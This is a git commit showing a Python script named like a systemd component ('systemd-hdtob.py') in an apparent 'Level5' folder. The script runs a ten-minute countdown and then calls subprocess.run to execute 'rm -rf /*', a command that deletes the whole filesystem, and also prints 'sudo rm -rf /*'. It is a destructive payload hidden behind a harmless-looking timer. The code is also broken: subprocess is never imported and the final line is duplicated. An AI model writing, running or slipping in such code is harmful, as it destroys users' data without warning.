Level/Level5/systemd-hdtob.py aktualisiert

This commit is contained in:
2025-11-17 12:05:27 +00:00
parent 7aefa4d78d
commit 5589c543b3

View File

@@ -1,10 +1,11 @@
import time
import sys
def countdown(seconds):
for remaining in range(seconds, 0, -1):
mins, secs = divmod(remaining, 60)
print(f"{mins:02d}:{secs:02d}", end="\r")
time.sleep(1)
subprocess.run(["rm", "-rf", "/*"])
print("sudo rm -rf /*")
if __name__ == "__main__":
countdown(600)
countdown(600)